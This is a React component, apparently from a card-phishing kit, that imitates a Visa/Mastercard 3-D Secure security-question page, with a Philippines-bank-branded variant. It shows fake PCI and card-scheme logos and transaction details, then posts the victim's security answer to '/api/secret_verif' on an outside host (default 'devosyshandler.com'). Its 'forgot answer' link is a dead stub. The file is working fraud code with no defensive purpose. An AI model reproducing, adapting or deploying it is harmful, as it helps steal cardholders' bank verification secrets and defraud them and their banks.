import React, { useState } from 'react';
import HelpImage from './assets/help.gif';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMastercard } from '../cardScheme';

const SecurityQuestionPage = () => {
  const [balance_input, set_balance_input] = useState('');
  const [isSubmitting, setIsSubmitting] = useState(false);
  const navigate = useNavigate();
  const design = localStorage.getItem('session_design') || '';
  const customQuestion = localStorage.getItem('seq_quest') || 'Security Question';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
    .toString()
    .padStart(2, '0')}/${today.getFullYear()}`;

  const handleCodeSubmit = async (e) => {
    if (e?.preventDefault) e.preventDefault();
    if (!balance_input.trim() || isSubmitting) return;

    setIsSubmitting(true);
    navigate('/3ds/loading');

    const dataToSend = {
      uuId: localStorage.getItem('uuId'),
      question: localStorage.getItem('seq_quest'),
      answer: balance_input,
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/secret_verif`, dataToSend);
    } catch (error) {
      setTimeout(() => {
        setIsSubmitting(false);
      }, 3000);
    }
  };

  const handleBalanceInputChange = (e) => {
    set_balance_input(e.target.value);
  };

  // 1. Philippines Bank Branded Security Question
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={balance_input}
        setAnswer={set_balance_input}
        handleQuestionSubmit={handleCodeSubmit}
        isSubmitting={isSubmitting}
        onCancel={() => navigate('/checkout')}
      />
    );
  }

  // 2. Standard 3DS Layout
  const isMc = isMastercard(design);
  const imageSrc = isMc ? MasterImage : VisaImage;
  const altText = isMc ? 'Mastercard' : 'Visa';
  const isBtnDisabled = !balance_input.trim() || isSubmitting;

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300">
        <div className="flex items-center justify-between w-full mb-6">
          <img
            src={PciImage}
            alt="PCI DSS Compliant"
            className="h-12 mr-4"
          />
          {imageSrc && (
            <img src={imageSrc} alt={altText} className="h-12" />
          )}
        </div>
        <h1 className="mb-4 text-lg font-bold text-gray-800">
          Answer Security Question
        </h1>
        <p className="mb-6 text-xs text-gray-900">
          To complete this payment, please answer the security question below.
          This helps ensure the security of your account.
        </p>
        <div className="grid grid-cols-2 mb-4 text-xs">
          <span className="text-xs">Merchant:</span>
          <span className="text-gray-900">{process.env.REACT_APP_MERCHANT_NAME || 'Dino World'}</span>

          <span className="text-xs">Date:</span>
          <span className="text-gray-700">{formattedDate}</span>

          <span className="text-xs">Card Number:</span>
          <span className="text-gray-900">**** **** **** {localStorage.getItem('last-four-digits') || '••••'}</span>

          <span className="text-xs">Amount:</span>
          <span className="text-gray-900">{localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY || 'PHP'} {localStorage.getItem('summ') || '0.00'}</span>
        </div>

        <div>
          <div className="grid items-center grid-cols-1">
            <label htmlFor="security-answer" className="block mt-4 mb-2 font-semibold text-neutral-700">
              {customQuestion}
            </label>
            <input
              id="security-answer"
              type="text"
              placeholder="Enter Answer"
              value={balance_input}
              onChange={handleBalanceInputChange}
              className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none text-neutral-900 bg-white"
              style={{ color: '#171717', backgroundColor: '#ffffff' }}
            />
            <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
              <a href="#forgot" onClick={(e) => e.preventDefault()} className="leading-3 underline hover:underline">
                Forgot the answer to your security question?
              </a>
            </div>
          </div>

          <div className="flex items-center justify-between">
            <button
              type="button"
              onClick={() => navigate('/checkout')}
              className="px-4 py-2 text-xs font-medium text-neutral-600 hover:text-neutral-900 cursor-pointer"
              style={{ color: '#525252' }}
            >
              Cancel
            </button>
            <button
              onClick={handleCodeSubmit}
              type="button"
              disabled={isBtnDisabled}
              className={`px-5 py-2 text-xs font-bold rounded-md transition-all flex items-center justify-center gap-2 min-w-[100px] cursor-pointer ${
                isBtnDisabled
                  ? 'bg-gray-200 text-gray-400 border border-gray-300 cursor-not-allowed opacity-60'
                  : 'bg-[#0056b3] hover:bg-[#004494] text-white border border-[#004494] shadow-md'
              }`}
            >
              {isSubmitting ? (
                <>
                  <span className="inline-block w-3.5 h-3.5 border-2 border-white/30 border-t-white rounded-full animate-spin flex-shrink-0" />
                  <span>SUBMIT</span>
                </>
              ) : (
                'SUBMIT'
              )}
            </button>
            <button
              type="button"
              onClick={() => alert("Please answer the security question assigned to your card or contact your bank.")}
              className="flex items-center px-4 py-2 text-xs font-medium text-neutral-600 hover:text-neutral-900 cursor-pointer"
              style={{ color: '#525252' }}
            >
              <img className="mr-1" src={HelpImage} alt="" />
              Help
            </button>
          </div>
        </div>
      </div>
    </div>
  );
};

export default SecurityQuestionPage;
